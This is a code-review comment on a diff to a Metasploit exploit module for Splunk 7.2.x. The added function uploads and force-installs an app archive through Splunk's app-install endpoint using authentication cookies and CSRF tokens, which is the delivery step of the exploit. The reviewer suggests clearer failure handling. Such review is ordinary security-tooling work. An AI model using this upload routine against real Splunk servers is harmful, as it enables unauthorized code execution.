modules/exploits/multi/http/splunk_upload_app_exec.rb

```diff
@@ -286,6 +386,48 @@ def do_upload_app(app_name, file_name)
     end
   end
 
+   # version  7.2.x only
+  def do_upload_app_7(app_name, file_name)
+    archive_file_name = ::File.basename(file_name)
+    print_status("Uploading file #{archive_file_name}")
+    file_data = ::File.read(file_name)
+
+    boundary = '---------------------------' + rand_text_numeric(29)
+
+    data =  "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"state\"\r\n"
+    data << "\r\n#{@state_token}\r\n"
+
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n"
+    data << "\r\n#{@splunkweb_csrf_token_8000_id}\r\n"
+    
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n"
+    data << "Content-Type: application/x-compressed-tar\r\n\r\n"
+    data << file_data
+    data << "\r\n--#{boundary}\r\n"
+
+    data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n"
+    data << "1"
+    data << "\r\n--#{boundary}--\r\n"
+  
+    res = send_request_cgi(
+      {
+        'uri' => '/en-US/manager/appinstall/_upload',
+        'method' => 'POST',
+        'cookie' => "#{@auth_cookies};",
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'data' => data
+      }, 30)
+
+    if res && (res.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))
```

Comment:
The operator may receive `Error uploading` for a variety of different reasons, and will be left in a state of confusion, alleviated only by reading the module source code.

Suggest:

```ruby
    unless res
      fail_with(Failure::Unreachable, "Connection failed")
    end

    unless res.code == 303 || res.code == 200
      fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
    end

    if res.body.include?('There was an error processing the upload')
      fail_with(Failure::Unknown, "Error uploading")
    end

    print_good("#{app_name} successfully uploaded")
```